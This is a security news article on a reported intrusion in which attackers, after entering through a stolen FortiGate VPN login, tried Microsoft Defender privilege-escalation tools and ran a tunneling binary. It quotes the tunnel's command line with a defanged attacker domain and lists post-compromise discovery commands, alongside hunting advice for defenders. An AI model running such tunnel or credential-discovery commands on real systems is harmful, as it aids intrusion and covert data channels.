Hackers use Nightmare-Eclipse tools after FortiGate SSL VPN compromise
6 min. read 
Published on
Threat hunters have confirmed the first real-world intrusion where attackers used the publicly released Nightmare-Eclipse toolkit after gaining access through what appears to be a compromised FortiGate SSL VPN account. Huntress says the activity included BlueHammer, RedSun, and UnDefend, along with a separate tunneling tool it calls BeigeBurrow.
The case matters because it shows how quickly public exploit tooling can move from proof-of-concept release to live enterprise abuse. Huntress says the attackers relied on valid VPN credentials, staged binaries in user-writable folders, ran post-compromise discovery commands, and attempted to use Defender-focused privilege escalation tools that had already become widely available online.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Microsoft patched BlueHammer in April 2026 as CVE-2026-33825, but RedSun and UnDefend remained unpatched as of the Huntress report. NVD describes CVE-2026-33825 as an elevation-of-privilege flaw in Microsoft Defender that allows a local authorized attacker to gain higher privileges.
How the intrusion unfolded
Huntress says it first saw suspected in-the-wild BlueHammer activity on April 10, 2026, when a binary named FunnyApp.exe ran from a user’s Pictures folder and was then quarantined by Microsoft Defender. Several days later, analysts saw RedSun.exe launched from the Downloads directory and multiple executions of the UnDefend binary from short folder paths.
The suspected initial access point was a FortiGate SSL VPN login using valid credentials. Huntress says the victim organization later provided VPN logs showing one session from an IP geolocated to Russia, followed by additional unauthorized sessions from Singapore and Switzerland tied to the same account. Huntress presents that pattern as evidence consistent with credential abuse.
Fortinet has separately warned that valid-account VPN abuse remains a common intrusion path, especially where remote access lacks strong controls such as MFA. In a threat research post published in late 2025, the company said adversaries had used valid credentials to authenticate to VPN infrastructure and gain broad internal access.
What the Nightmare-Eclipse tools do
BlueHammer, RedSun, and UnDefend all target Microsoft Defender behavior. Huntress says BlueHammer was the first of the set to appear in this intrusion, and Microsoft fixed the underlying flaw in April 2026 under CVE-2026-33825. NVD lists the issue as a Microsoft Defender elevation-of-privilege vulnerability with local attack requirements and high impact to confidentiality, integrity, and availability.
RedSun appears more serious operationally because it still worked on fully patched Windows systems after April Patch Tuesday, according to third-party security analyses. Vectra and Cyderes both say RedSun abuses Defender-related behavior to overwrite a protected service binary and gain SYSTEM-level execution without administrator rights.
UnDefend serves a different role. Rather than escalating privileges directly, it attempts to weaken Defender protections and interfere with updates or core security functions. Huntress says the threat actor in this case used the tool clumsily, including a misspelled -agressive flag, which suggested incomplete familiarity with the publicly released tooling.
BeigeBurrow was the tool that actually worked
The most important part of the incident may not have been the failed privilege escalation attempts. Huntress says the only tool that clearly achieved its goal was a Go-based Windows binary it named BeigeBurrow, executed as agent.exe -server staybud.dpdns[.]org:443 -hide. The binary used HashiCorp’s Yamux library to create a covert relay channel over port 443.
That detail matters because port 443 blends into normal encrypted traffic in many enterprise environments. Huntress says BeigeBurrow successfully established outbound connectivity, making it the one component in the observed toolkit that produced a working attacker channel. The company also says it has seen BeigeBurrow in at least one other unrelated intrusion, though it did not attribute the activity to a specific threat group.
Huntress also observed hands-on-keyboard behavior after the initial access phase. Investigators saw common post-exploitation commands such as whoami /priv, cmdkey /list, and net group, including one odd case where whoami /priv was launched from an M365Copilot.exe process. Huntress said it could not fully explain that parent-child relationship.
At a glance
| Tool or artifact | Role in the intrusion | Outcome |
|---|---|---|
| BlueHammer | Defender privilege escalation tool tied to CVE-2026-33825 | Attempted, but did not succeed |
| RedSun | Defender-targeting local privilege escalation tool | Attempted, but did not succeed |
| UnDefend | Tool designed to degrade Defender protections | Interrupted during response |
| BeigeBurrow | Go-based tunneling and relay utility over port 443 | Successfully connected outbound |
| FortiGate SSL VPN access | Likely initial access using valid credentials | Enabled unauthorized remote sessions |
Why defenders should pay attention
This intrusion shows a pattern that security teams will likely see again. Public exploit releases do not need to be sophisticated to create real risk. Even when the operator makes mistakes, a working VPN login plus commodity post-exploitation tooling can still produce meaningful access inside a victim network.
The failed BlueHammer, RedSun, and UnDefend runs should not reassure defenders too much. Huntress stopped the activity before those tools could complete their goals, but BeigeBurrow connected successfully and the attacker was already performing internal discovery. In practical terms, that means the intrusion had already crossed from attempted abuse into active compromise.
It also underlines a basic point about remote access security. A patched endpoint can still be at risk if attackers get in first through stolen or reused credentials. Fortinet’s own research has repeatedly emphasized that valid-account abuse remains central to financially motivated intrusions, especially where MFA is absent or weakly enforced.
Recommended actions
- Apply Microsoft’s April 2026 security updates that fix CVE-2026-33825.
- Hunt for
FunnyApp.exe,RedSun.exe,undef.exe,z.exe, and suspicious binaries in user-writable folders. - Review VPN logs for impossible-travel patterns or multiple-country logins tied to the same user.
- Investigate any
agent.exeexecution with-serverand-hideflags, especially outbound connections to unusual domains over port 443. - Alert on
whoami /priv,cmdkey /list, andnet groupwhen launched from unusual parent processes. - Enforce MFA on FortiGate SSL VPN and other remote access systems, then rotate credentials for accounts that show suspicious access.
FAQ
Yes. Microsoft fixed BlueHammer in April 2026 as CVE-2026-33825. NVD lists it as a local elevation-of-privilege flaw in Microsoft Defender.
As of the Huntress report published on April 21, 2026, Huntress said RedSun and UnDefend remained unpatched. Some third-party security vendors also described both as still usable against updated Windows systems at that time.
No. Huntress says BlueHammer did not dump SAM credentials, RedSun did not overwrite TieringEngineService.exe, and UnDefend was interrupted during remediation. BeigeBurrow was the only observed component that clearly achieved its intended purpose.
Huntress says the most likely entry point was FortiGate SSL VPN access using valid credentials. The company based that conclusion on customer-provided VPN logs and multi-country login activity tied to the same account.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
Improve this guide
User forum
0 messages